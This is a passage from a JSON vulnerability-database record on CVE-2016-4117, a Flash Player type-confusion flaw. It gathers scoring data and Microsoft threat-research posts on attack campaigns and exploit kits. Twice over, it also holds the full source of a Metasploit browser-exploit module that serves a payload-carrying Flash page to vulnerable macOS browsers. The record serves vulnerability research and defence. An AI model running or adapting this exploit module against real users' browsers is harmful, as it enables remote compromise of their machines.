"CVE-2016-4117", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2019-02-12T11:29:00", "cpe": ["cpe:/a:adobe:flash_player:21.0.0.226"], "id": "CVE-2016-4117", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4117", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:21.0.0.226:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2020-10-07T21:18:48", "description": "This module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-12-21T08:54:35", "type": "metasploit", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\n 'Description' => %q(\n This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\n 'bcook-r7' # Imported Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2016-4117'],\n ['BID', '90505'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\n ['URL', 'http://www.securitytracker.com/id/1035826'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['osx'],\n 'BrowserRequirements' =>\n {\n source: /script|headers/i,\n os_name: lambda do |os|\n os =~ OperatingSystems::Match::MAC_OSX\n end,\n ua_name: lambda do |ua|\n case target.name\n when 'Mac OS X'\n return true if ua == Msf::HttpClients::SAFARI\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n flash: lambda do |ver|\n case target.name\n when 'Mac OS X'\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [\n 'Mac OS X', {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2016-04-27',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri.end_with? 'swf'\n print_status('Sending SWF...')\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name.include? 'osx'\n platform_id = 'osx'\n end\n html_template = %(<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n )\n\n return html_template, binding\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\n File.binread(path)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-17T23:29:00", "description": "This module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.\n", "cvss3": {}, "published": "2018-12-21T08:54:35", "type": "metasploit", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-4117"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP/", "href": "https://www.rapid7.com/db/modules/exploit/osx/browser/adobe_flash_delete_range_tl_op/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\n 'Description' => %q(\n This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\n 'bcook-r7' # Imported Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2016-4117'],\n ['BID', '90505'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\n ['URL', 'http://www.securitytracker.com/id/1035826'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['osx'],\n 'BrowserRequirements' =>\n {\n source: /script|headers/i,\n os_name: lambda do |os|\n os =~ OperatingSystems::Match::MAC_OSX\n end,\n ua_name: lambda do |ua|\n case target.name\n when 'Mac OS X'\n return true if ua == Msf::HttpClients::SAFARI\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n flash: lambda do |ver|\n case target.name\n when 'Mac OS X'\n return true if Rex::Version.new(ver) <= Rex::Version.new('21.0.0.182')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [\n 'Mac OS X', {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2016-04-27',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri.end_with? 'swf'\n print_status('Sending SWF...')\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name.include? 'osx'\n platform_id = 'osx'\n end\n html_template = %(<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n )\n\n return html_template, binding\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\n File.binread(path)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "mmpc": [{"lastseen": "2017-07-14T04:03:11", "description": "Targeted attacks are typically carried out against individuals to obtain intellectual property and other valuable data from target organizations. These individuals are either directly in possession of the targeted information or are able to connect to networks where the information resides. Microsoft researchers have encountered twin threat activity groups that appear to target individuals for reasons that are quite uncommon.\n\nUnlike many activity groups, which typically gather information for monetary gain or economic espionage, PROMETHIUM and NEODYMIUM appear to launch campaigns simply to gather information about certain individuals. These activity groups are also unusual in that they use the same zero-day exploit to launch attacks at around the same time in the same region. Their targets, however, appear to be individuals that do not share common affiliations.\n\n## Activity group profiles\n\n**PROMETHIUM** is an activity group that has been active as early as 2012. The group primarily uses [Truvasys](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Truvasys.A!dha>), a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, where it has masqueraded as one of server common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys malware evolved with additional features\u2014this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.\n\n**NEODYMIUM** is an activity group that is known to use a backdoor malware detected by Microsoft as [Wingbird](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Wingbird.A!dha>). This backdoor\u2019s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.\n\n## Similarly timed attacks\n\nIn early May 2016, both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe. They both used an exploit for [CVE-2016-4117](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>), a vulnerability in Adobe Flash Player that, at the time, was both unknown and unpatched.\n\nPROMETHIUM distributed links through instant messengers, pointing recipients to malicious documents that invoked the exploit code to launch Truvasys on victim computers. Meanwhile, NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code, ultimately leading to Wingbird\u2019s installation on victim computers.\n\nWhile the use of the same exploit code could be attributed to coincidence, the timing of the campaigns and the geographic location of victims lend credence to the theory that the campaigns are somehow related.\n\n## Stopping exploits in Windows 10\n\nPROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload. [Protected view](<https://support.office.com/en-us/article/What-is-Protected-View-d6f09ac7-e6b9-4495-8e43-2bbcdbcb6653>), a security feature introduced in Microsoft Office 2010, can prevent the malicious Flash code from loading when the document is opened. [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>), a security feature that is turned on by default in Windows 10 and Microsoft Office 365 64-bit, can stop attempts to exploit memory corruption vulnerabilities. In addition, [Credential Guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard>), an optional feature introduced in Windows 10, can stop Wingbird\u2019s use of the system file, _lsass.exe_, to load a malicious DLL.\n\n## Detecting suspicious behaviors with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://blogs.windows.com/windowsexperience/2016/03/01/announcing-windows-defender-advanced-threat-protection/>) (Windows Defender ATP) is a new built-in service that ships natively with Windows 10 and helps enterprises to detect, investigate and respond to advanced targeted attacks. When activated, it captures behavioral signals from endpoints and then uses cloud-based machine learning analytics and threat intelligence to flag attack-related activities.\n\nWingbird, the advanced malware used by NEODYMIUM, has several behaviors that trigger alerts in Windows Defender ATP. Windows Defender ATP has multiple behavioral and machine learning detection rules that can catch various elements of the malware kill chain. As a result, it can generically detect, without any signature, a NEODYMIUM attack in the following stages:\n\n * Zero-day exploits causing Microsoft Office to generate and execute malicious files\n * Zero-day exploits attempting to grant malicious executables higher privileges\n * Malicious files trying to delete themselves\n * Malicious files attempting the DLL side-loading technique, in which legitimate DLLs in non-standard folders are replaced by malicious ones so that malicious files are loaded by the operating system or by installed applications\n * Malicious files injecting code into legitimate processes\n\nIn the example below, Windows Defender ATP alerts administrators that something is amiss. It notifies them that an Office document has dropped an executable file in one of their computers\u2014activity that is very likely part of an attack.\n\n\n\nAdditionally, Windows Defender ATP and Office 365 ATP leverage rules based on IOCs and threat intelligence specific to PROMETHIUM and NEODYMIUM. Alerts from these rules work alongside concise briefs and in-depth profiles provided in the Windows Defender ATP console to help administrators address breach attempts by these activity groups.\n\nFor more information about Windows Defender ATP service in Windows 10, check out [its features and capabilities](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-ATP>) and read more about why a [post-breach detection approach is a key component of any enterprise security stack.](<http://wincom.blob.core.windows.net/documents/Post%20Breach%20Dealing%20with%20Advanced%20Threats%20Whitepaper.pdf>)\n\nDetails about PROMETHIUM and NEODYMIUM along with indicators of compromise can be found in the Microsoft [Security Intelligence Report volume 21](<https://www.microsoft.com/security/sir/default.aspx>).\n\n \n\n_\\- Windows Defender ATP team_", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-14T18:55:25", "title": "Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4117"], "modified": "2016-12-14T18:55:25", "href": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/", "id": "MMPC:AA804B66BAFEF336F846CBD7F0B391A2", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-06-30T15:02:20", "description": "Despite the disruption of Axpergle (Angler), which dominated the landscape in early 2016, exploit kits as a whole continued to be a threat to PCs running unpatched software. Some of the most prominent threats, from malvertising to ransomware, used exploit kits to infect millions of computers worldwide in 2016.\n\nThe prevalence of exploit kits as an infection vector can be attributed to these factors: 1) they continue to use old but effective exploits while efficiently integrating new ones, 2) they are easily obtained from underground cybercriminal markets; and 3) there remains a significant number of machines that are potentially vulnerable because they run unpatched software.\n\nUsing up-to-date browser and software remains to be the most effective mitigation against exploit kits. Upgrading to the latest versions and enabling automatic updates means patches are applied as soon as they are released.\n\n(Note: This blog post is the first in the 2016 threat landscape review series. In this blog series, we look back at how major areas in the threat landscape, including ransomware, macro malware, support scam malware, and unwanted software, have transformed over the past year. We will discuss trends that have emerged, as well as security solutions that tackle threats as they evolve.)\n\n## Meadgive gained ground as Axpergle is disrupted\n\nIn the first five months of 2016, [Axpergle](<https://blogs.technet.microsoft.com/mmpc/tag/axpergle/>) (also known as Angler exploit kit) infected around 100,000 machines monthly. However, sometime in June, the exploit kit vanished. Reports associated this development with the [arrest of 50 hackers in Russia](<http://www.securityweek.com/did-angler-exploit-kit-die-russian-lurk-arrests>).\n\nAxpergle is primarily associated with the delivery of the 32- and 64-bit versions of [Bedep](<https://blogs.technet.microsoft.com/mmpc/2016/04/12/msrt-april-release-features-bedep-detection/>), a backdoor that also downloads more complex and more dangerous malware, such as the information stealers [Ursnif](<https://blogs.technet.microsoft.com/mmpc/tag/ursnif/>) and [Fareit](<https://blogs.technet.microsoft.com/mmpc/tag/win32fareit/>).\n\n\n\n_Figure 1. Monthly encounters by exploit kit family_\n\nThe disappearance of Axpergle made way for other exploit kits as cybercriminals presumably looked for alternatives. The Neutrino exploit kit started dominating for around three months, but scaled down in September. Reports say that Neutrino operators went into \u201cprivate\u201d mode, choosing to cater to select cybercriminal groups.\n\nA look at the year-long trend shows that [Meadgive](<https://blogs.technet.microsoft.com/mmpc/tag/meadgive/>) (also known as RIG exploit kit) filled the hole left by Axpergle and Neutrino (and Nuclear before them). By the end of 2016, while overall volume has gone down, most exploit kit activity can be attributed to Meadgive.\n\nMeadgive has been around since March 2014. Attackers who use Meadgive typically inject a malicious script island into compromised websites. When the compromised site is accessed, the malicious script, which is usually obfuscated, loads the exploit. Recently, Meadgive has primarily used an exploit for the Adobe Flash vulnerability CVE-2015-8651 that executes a JavaScript file, which then downloads an encrypted PE file.\n\nEven with the decreased activity, exploit kits continue to be a global threat, having been observed in more than 200 countries in 2016. They affect the following territories the most:\n\n 1. United States\n 2. Canada\n 3. Japan\n 4. United Kingdom\n 5. France\n 6. Italy\n 7. Germany\n 8. Taiwan\n 9. Spain\n 10. Republic of Korea\n\n\n\n_Figure 2. Geographic distribution of exploit kit encounters_\n\n## Exploit kits in the ransomware trail\n\nAs exploit kits have become reliable means to deliver malware, it is not surprising that ransomware, currently the most prevalent malware, continue to use them as launch pads for infection.\n\nMeadgive, for instance, is known for delivering one of the most active ransomware in 2016. As late as December 2016, we documented new [Cerber](<https://blogs.technet.microsoft.com/mmpc/tag/cerber/>) ransomware versions being delivered through a [Meadgive exploit kit campaign](<https://blogs.technet.microsoft.com/mmpc/2016/12/21/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close/>), on top of a concurrent spam campaign.\n\nNeutrino, which temporarily dominated in 2016, is associated with another prominent ransomware family. Like Cerber, [Locky](<https://blogs.technet.microsoft.com/mmpc/tag/locky/>) also uses both exploit kits and spam email as vectors. With the decreased activity from Neutrino, we\u2019re seeing Locky being distributed more and more through spam campaigns.\n\n**Top malware families associated with exploit kits**\n\n**Malware family** | **Related exploit kit family** \n---|--- \n[Backdoor:Win32/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Backdoor:Win64/Bedep](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Backdoor:Win32/Bedep>) | Axpergle (Angler) \n[Ransom:Win32/Cerber](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Cerber>) | Meadgive (RIG) \n[Ransom:Win32/Locky](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Locky>) | Neutrino \n[Trojan:Win32/Derbit](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Trojan:Win32/Derbit.A>) | SundownEK \n \n## Integrating exploits at a slower rate\n\nWhile exploit kits rely on exploits for patched vulnerabilities, they also continually update their arsenal with newer exploits in the hope of casting bigger nets. This also allows them to take advantage of the window of opportunity between the release of a security fix and the time it is actually applied by users. Notably, the rate with which exploit kits integrate exploits for newly disclosed vulnerabilities is lower than in previous years.\n\nOf the major exploits used by kits in 2016, one is relatively old\u2014an exploit for a Microsoft Internet Explorer bug that was disclosed and patched back in 2014 (CVE-2014-6332). Four major kits use an exploit for the Adobe Flash vulnerability CVE-2015-8651, which was patched back in 2015.\n\nThree exploits disclosed in 2016 were seen in exploit kits, showing that operators still attempt continually improve their tools. One of these is a zero-day exploit for Adobe Flash (CVE-2016-1019) used by Pangimop at least five days before it was patched. However, this particular zero-day is a \u201cdegraded\u201d exploit, which means that it worked only on older versions of Adobe Flash. The exploit did not affect the latest version of the software at the time, because Adobe previously introduced stronger exploit mitigation, which Microsoft helped build.\n\n**Major exploits used by exploit kits**\n\n**Exploit** | **Targeted Product ** | ** Exploit kit** | **Date patched** | **Date first seen in exploit kit** \n---|---|---|---|--- \nCVE-2014-6332 | Microsoft Internet Explorer (OLE) | NeutrinoEK | November 11, 2014 ([MS14-064](<https://technet.microsoft.com/en-us/library/security/ms14-064.aspx?f=255&MSPPError=-2147217396>)) | November 19, 2014 \nCVE-2015-8651 | Adobe Flash | Axpergle, NeutrinoEK, Meadgive, SteganoEK | December 28, 2015 ([APSB16-01](<https://helpx.adobe.com/security/products/flash-player/apsb16-01.html>)_)_ | December 28, 2015 \nCVE-2016-0189 | Microsoft Internet Explorer | NeutrinoEK | May 10, 2016 ([MS16-051](<https://technet.microsoft.com/en-us/library/security/ms16-051.aspx>)) | July 14, 2016 \nCVE-2016-1019 | Adobe Flash | Pangimop, NeutrinoEK | April 7, 2016 ([ASPB16-10](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>)_)_ | April 2, 2016 (zero-day) \nCVE-2016-4117 | Adobe Flash | NeutrinoEK | May 12, 2016 ([ASPB16-15](<https://helpx.adobe.com/security/products/flash-player/apsb16-15.html>)_)_ | May 21, 2016 \n \nWe did not see exploit kits targeting Microsoft\u2019s newest and most secure browser, Microsoft Edge, in 2016. Only a few days into the new year, however, SundownEK was updated to include an exploit for an old vulnerability that was patched a couple of months prior. Microsoft Edge applies patches automatically by default, rendering the exploit ineffective.\n\nIt was also SundownEK that integrated steganography in late 2016. Steganography, a technique that is not new but getting more popular with cybercriminals, hides information like malicious code or encryption keys in images.\n\nInstead of loading the exploit directly from a landing page, SundownEK downloads an image that contains the exploit code. This method is employed to avoid detection.\n\n## Stopping exploit kits with updates and a secure platform\n\nWhile we see a willingness among cybercriminals to switch from exploit kits to spam and other vectors, there is a clear desire to continue using kits. We see cybercriminals switch from one kit to another, replacing kits as they become unavailable. Meanwhile, exploit kit authors continue to keep their wares attractive to cybercriminals by incorporating new exploits.\n\nKeeping browsers and other software up-to-date can counter the impact of exploit kits. [Microsoft Edge](<https://technet.microsoft.com/itpro/microsoft-edge/index>) is a secure browser that gets updated automatically by default. It also has multiple built-in [defenses](<https://microsoft.sharepoint.com/teams/osg_core_dcp/cpub/partner/antimalware/Shared Documents/8438038_RS2_Blogs/2016 in Review series/-%09https:/www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>) against exploit kits that attempt to download and install malware. These defenses include on-by-default sandboxing and state of the art exploit mitigation technologies. Additionally, [Microsoft SmartScreen](<https://blogs.windows.com/msedgedev/2015/12/16/smartscreen-drive-by-improvements/#3FYqD02TC1A6VsaL.97>), which is used in both Microsoft Edge and Internet Explorer 11, blocks malicious pages, such as landing pages used by exploit kits.\n\nAt the same time, running a secure platform like Windows 10 enables users to benefit from advanced security features.\n\n[Windows Defender](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) uses IExtensionValidation (IEV) in Microsoft Internet Explorer 11 to detect exploits used by exploit kits. Windows Defender can also detect the malware that exploit kits attempt to download and execute.\n\nWindows 10 Enterprise includes [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>), which can lock down devices and provide kernel-level virtualization based security.\n\n[Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) alerts security operation teams about suspicious activities, including exploitation of vulnerabilities and the presence of malware, allowing them to detect, investigate, and respond to attacks.\n\n \n\n_MMPC_\n\n \n\n## Related blog entries:\n\n * [World Backup Day is as good as any to back up your data](<https://blogs.technet.microsoft.com/mmpc/2017/03/28/world-backup-day-is-as-good-as-any-to-back-up-your-data/>)\n * [Ransomware: a declining nuisance or an evolving menace?](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>)\n * [Averting ransomware epidemics in corporate networks with Windows Defender ATP](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-01-23T22:37:34", "title": "Exploit kits remain a cybercrime staple against outdated software \u2013 2016 threat landscape review series", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1019", "CVE-2014-6332", "CVE-2016-0189", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-01-23T22:37:34", "href": "https://blogs.technet.microsoft.com/mmpc/2017/01/23/exploit-kits-remain-a-cybercrime-staple-against-outdated-software-2016-threat-landscape-review-series/", "id": "MMPC:A8911A071FAE866BC15F59CA0B325D45", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2021-12-21T13:32:55", "description": "This Metasploit module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-02-09T00:00:00", "type": "zdt", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type Confusion Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 